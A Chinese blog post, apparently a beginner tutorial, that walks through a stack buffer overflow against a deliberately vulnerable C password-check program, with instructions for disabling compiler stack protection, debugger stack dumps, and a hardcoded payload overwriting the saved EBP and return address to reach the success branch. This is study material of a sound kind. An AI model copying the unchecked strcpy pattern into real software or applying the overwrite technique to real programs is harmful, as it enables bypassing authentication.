2.栈溢出简单利用

最新推荐文章于 2022-05-29 15:41:26 发布
最新推荐文章于 2022-05-29 15:41:26 发布
阅读量1.6k 收藏
点赞数 1
分类专栏: 溢出学习 文章标签: buffer null 语言 测试 c
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/evi10r/article/details/7036545
版权

看代码

#include <stdio.h>
#include "windows.h"
#define  PASSWORD "1234567"
int verify_password(char *password)
{
	int authenticated;
	char buffer[8];
	authenticated=strcmp(password,PASSWORD);
	strcpy(buffer,password);
	return authenticated;
}

int main()
{
	int valid_flag=0;
	char password[1024];
	while (1)
	{
		printf("请输入密码:");
		scanf("%s",password);
		valid_flag=verify_password(password);
		if (valid_flag)
		{
			printf("错误!\n");
		}
		else
		{
			printf("正确!\n");
			break;
		}
	}
	return 0;
}

会点C语言就能看懂吧,有个验证密码是否正确的函数

要注意的一点是要关闭编译时的GZ选项,VC6以上版本关闭GS编译选项

具体方式:vc6工程-设置-c/c++-工程选项里面去掉GZ

       vs C/C++ 代码生成 缓冲区安全检查 否

生成程序输入密码,当输入的为8位但是数值比1234567大时均会通过验证,这是为什么呢?

拿到OD中看下

当输入12345678时,堆栈中如下所示

0012FB18   34333231	;4321
0012FB1C   38373635	;8765
0012FB20   00000000;	;authenticated
0012FB24  /0012FF80;	;ebp


strcmp之后authenticated的值为0000001,strcpy函数用字符串12345678最后一个NULL给覆盖了这个值,所以会通过验证
当我们输入01234567时,因为比1234567小,所以strcmp会返回-1.补码为0xFFFFFFFF,OD中看下 

0012FB18   33323130	;3210
0012FB1C   37363534	;7654
0012FB20   FFFFFF00	;authenticated
0012FB24  /0012FF80	;ebp

authenticated为FFFFFF,所以还是不会通过验证的
另外问下为什么我OD中那些像strcpy什么的函数都识别不出来,CALL的都是一个模块内的地址
是不是符号的问题?


下面我们再换种方式

#include <stdio.h>
#include "windows.h"
#define  PASSWORD "1234567"
char *p={
	"\x12\x12\x12\x12\x12\x12\x12\x12"//buffer
	"\x34\x34\x34\x34"//authenticated
	"\xaa\xaa\xaa\xaa"//ebp
	"\xbb\xbb\xbb\xbb"//eip
};
int verify_password(char *password)
{
	int authenticated;
	char buffer[8];
	authenticated=strcmp(password,PASSWORD);
	strcpy(buffer,password);
	return authenticated;
}

int main()
{
	int valid_flag=0;
	char password[1024];
	while (1)
	{
		printf("请输入密码:");
		scanf("%s",password);
		valid_flag=verify_password(p);
		if (valid_flag)
		{
			printf("错误!\n");
		}
		else
		{
			printf("正确!\n");
			break;
		}
	}
	return 0;
}

为了方便测试直接在程序内定义一个字符串,这样编译运行后会弹出一个引用的0xbbbbbbbb内存不能 为read错误,原因就不多说了。

我们把这个0xxbbbbbbbb改为输出正确的分支就可以,拖到OD中找到输出正确的地址,是0x00401106,替换掉就OK 。

运行下就会输出正确了,不过程序之后会崩溃掉,因为栈内EBP被覆盖为无效值,使得程序在退出时堆栈无法平衡。

W1nds
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
初识栈溢出利用栈溢出的四种攻击方法
Kni9hT's Blog
07-22 5774
栈溢出 本质: 混淆了用户输入与栈上的元数据 产生原因: 用户输入的数据大小超过了程序预留的空间大小 利用: 覆盖返回地址 覆盖栈上的变量,例如函数指针或对象指针 基本栈溢出漏洞实例:实际演示 stack_shellcode 以python语言举例, 运行报错。 据我理解,在python中,函数调用一次,栈(stack)多加一层栈帧,由于栈帧的增加有上限,函数调用次数过多会导致栈溢出。(在c语...
简单栈溢出利用
weixin_34138377的博客
07-28 112
#include<stdlib.h> #include<string.h> voidfun(char*name){ charbuf[10]; strcpy(buf,name); printf("%s\n",buf); } voidhack(){ printf("flag\n"); } intmain(){ ...
如何利用栈溢出执行指定的的代码_栈溢出SROP攻击
weixin_39932762的博客
12-06 165
原创:treebacker合天智汇原创投稿活动:http://link.zhihu.com/?target=https%3A//mp.weixin.qq.com/s/Nw2VDyvCpPt_GG5YKTQuUQ高级ROP-SROP利用在刷题时碰到这个考察点,有点震撼,特意记录下。SROP简介SROP也即Sigreturn Oriented Programming。很显然这种攻击方式与Unix系统调...
一个小程序的栈溢出
tubaluer
01-12 179
看下面代码: #include &lt;stdio.h&gt; int cp (char *p) { int a; char b[8]; a=strcmp(p,"1234567"); strcpy(b,p); return a; } int main() { int v=0; char p[1024]; while(1) { printf("please input p...
栈溢出利用软件漏洞分析入门
04-08
- **案例01**:通过对一个简单的程序进行分析,演示如何找到潜在的栈溢出漏洞并利用它。 - **Microsoft TIFF图像文件处理栈溢出漏洞(MS07-055)**:此案例分析了微软产品中一个著名的栈溢出漏洞,展示了如何通过恶意...
简单溢出wp.pdf
最新发布
12-14
本文将围绕简单溢出wp.pdf这个主题,详细介绍栈溢出攻击的原理和方法。 什么是栈溢出栈溢出是一种常见的安全漏洞,发生在程序在栈中存储数据时,超过了栈的容量,导致溢出到其他内存区域的现象。这种漏洞可以被...
pwn栈溢出10道练习题有writeup
01-04
在这个场景中,"pwn栈溢出10道练习题有writeup" 提供了10个关于栈溢出的实战练习,每个题目都配有详细的解答,这对于学习和理解栈溢出漏洞原理及其利用技术非常有帮助。 栈溢出是由于程序在栈上分配的内存不足,...
迷宫寻路,栈实现.rar
10-14
这些常量有助于在程序运行时设定合适的栈参数,防止栈溢出。 "Stack.h"文件是栈的头文件,它应该定义了栈的数据结构和相关的操作函数。通常,一个简单的栈实现会包括以下部分: 1. 定义栈的结构体,可能包括栈底...
软件漏洞与缓冲区溢出奚PPT优秀资料.ppt
11-14
- **EIP指针篡改**:在栈溢出中,攻击者常尝试覆盖返回地址(EIP),使程序跳转到攻击者指定的地址执行代码。 - **Shellcode**:攻击者植入的机器码,用于在溢出后执行的恶意代码。 - **防止溢出策略**:包括边界...
pwnme1题目
09-30
pwnme1的题目,这个是一个简单栈溢出的题目
Windows内核漏洞学习-栈溢出(无GS)
WocW的博客
05-16 891
0x00: 前言 在上一节中,将HEVD的环境配置完成,接下来进行内核漏洞的调试复现。为什么首先做栈溢出呢,因为我以前学过一些Pwn知识,栈溢出算是最简单的漏洞了。使用的环境为: Windows7 x86 虚拟机系统 双机调试环境 HEVD靶场环境 0x01:漏洞原理 栈溢出原理 栈溢出,即在局部变量拷贝时,没有控制好拷贝进局部变量的长度。而局部变量又是保存在栈中的,一旦长度过长,就会导致数据溢出淹没栈环境,覆盖EBP甚至返回地址。 HEVD漏洞原理分析 给出实验漏洞代码。这里安全和不安全的操作都对比给
Crack密码验证小实验
Bonjour~
04-13 2046
首先来看一段用于密码验证的C语言代码:#include<stdio.h> #include<string.h>#define PASSWORD "1234567"int verify_password(char *password) { int authenticated; authenticated = strcmp(password,PASSWORD); return a
2.2.2 突破密码验证程序
bangren3304的博客
09-17 505
2.2.2 突破密码验证程序 实验环境 同1.4 Crack小实验 实验流程 在vc6.0中编写test.c文件编译运行 #include <stdio.h> #define PASSWORD "1234567" int verify_password (char * password) { int authenticated; char buffer[8...
嵌入式面试题(二、C/C++)
shark_93的博客
05-29 1347
二、C/C++ 1、new和malloc 1)malloc和free是c++/c语言的库函数,需要头文件支持stdlib.h;new和delete是C++的关键字,不需要头文件,需要编译器支持; 2)使用new操作符申请内存分配时,无需指定内存块的大小,编译器会根据类型信息自行计算。而malloc则需要显式地支持所需内存的大小。 3)new操作符内存分配成功时,返回的是对象类型的指针,类型严格与对象匹配,无需进行类型转换,故new是符合类型安全性的操作符。而malloc内存分配成功则是返回void*,需要通
警惕缓冲区溢出(C中那些不安全的库函数)
热门推荐
菜鸟的自留地-mooyang
05-16 2万+
C 和 C++ 不能够自动地做边界检查,边界检查的代价是效率。一般来讲,C 在大多数情况下注重效率。然而,获得效率的代价是,C 程序员必须十分警觉以避免缓冲区溢出问题。C语言标准库中的许多字符串处理和IO流读取函数是导致缓冲区溢出的罪魁祸首。我们有必要了解这些函数,在编程中多加小心。一、字符串处理函数 strcpy()strcpy()函数将源字符串复制到缓冲区。没有指定要复制字符的具体数目!如果源字
缓冲区溢出攻击1
輚至消亡
11-20 2283
1. 什么是缓冲区溢出攻击?   举个例子,一个杯子里装水,装满后依旧不停继续装那就会溢出来,这就是缓冲区溢出。 首先我们来看一段会有的缓冲区溢出问题的代码: #include &lt;stdio.h&gt; #include &lt;string.h&gt; #define PASSWD "1234567" int check_passwd(char *passwd) { cha...
ch1:Crack小实验
1ame的博客
10-23 414
实验环境: 操作系统 Windows7 IDE VC 6.0 build版本 debug 用于实验的C语言代码: #include #define PASSWORD "1234567" int verify_password(char * password) { int authenticated; authenticate
Windows栈溢出利用教程:从基础到高级
1. **栈溢出** - 教程的第一篇详细介绍了栈溢出的基本原理,包括缓冲区溢出的产生原因、如何利用溢出进行攻击以及如何编写简单的shellcode来控制程序执行流程。 2. **SEH(结构化异常处理)** - 第三篇教程深入讨论...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值